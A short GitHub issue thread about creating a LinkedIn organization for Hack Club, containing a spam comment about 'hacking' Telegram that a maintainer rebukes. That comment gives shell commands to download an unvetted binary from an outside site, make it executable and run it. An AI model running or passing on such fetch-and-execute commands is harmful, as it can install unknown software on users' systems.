### ISSUE TITLE
Create Hack Club org on LinkedIn

### ISSUE THREAD

**Issue by zachlatta** [hackclub/meta#675]
Create an organization on LinkedIn for Hack Club so club leaders & members can link to it on their profiles. See https://www.linkedin.com/in/bhargavy for an example of what it looks like without an official organization created.

**Comment by mafia-007** [comment]
Hi my Friend
What is your opinion about the hacking Tg telegram?
New telegram to connect to Tg
Comment Project hacking into tg

wget https://valtman.name/files/telegram-cli-1222
mv telegram-cli-1222 tg
chmod +x tg
./tg
-------
Thank

**Comment by MaxWofford** [comment]
@mafia-007: Please don't comment on our issues and PRs with unrelated messages. If you are interested in contributing, check out our [code of conduct](https://conduct.hackclub.com).

You will be blocked if you continue to post disruptive messages.

**Comment by MaxWofford** [comment]
This issue was moved to hackclub/hackclub#1008
